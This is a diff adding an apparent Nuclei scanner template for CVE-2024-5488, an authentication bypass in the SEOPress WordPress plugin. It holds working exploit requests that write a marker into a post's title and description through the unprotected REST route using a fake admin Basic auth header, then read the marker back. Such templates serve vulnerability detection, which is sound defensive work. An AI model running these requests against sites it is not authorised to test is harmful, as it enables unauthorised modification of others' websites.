diff --git a/http/cves/2024/CVE-2024-5488.yaml b/http/cves/2024/CVE-2024-5488.yaml new file mode 100644 index 00000000000..113a1c45858 --- /dev/null +++ b/http/cves/2024/CVE-2024-5488.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-5488 + +info: + name: SEOPress < 7.9 - Authentication Bypass + author: pdresearch,iamnoooob,rootxharsh + severity: critical + description: | + The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present. + reference: + - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/ + - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/ + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-5488 + epss-score: 0.00043 + epss-percentile: 0.09608 + metadata: + verified: true + max-request: 3 + tags: cve,cve2024,intrusive,wpscan,wp-plugin,seopress,auth-bypass + +flow: http(1) && http(2) && http(3) + +variables: + marker: "{{randstr}}" + username: "admin" + +http: + - raw: + - | + PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - 'Sorry, you are not allowed to do that.' + internal: true + + - raw: + - | + PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username+':aaaaaa')}} + Content-Type: application/x-www-form-urlencoded + + title={{marker}}&description={{marker}} + + matchers: + - type: word + part: body + words: + - '"code":"success"' + internal: true + + - raw: + - | + GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - '"title":"{{marker}}","description":"{{marker}}"'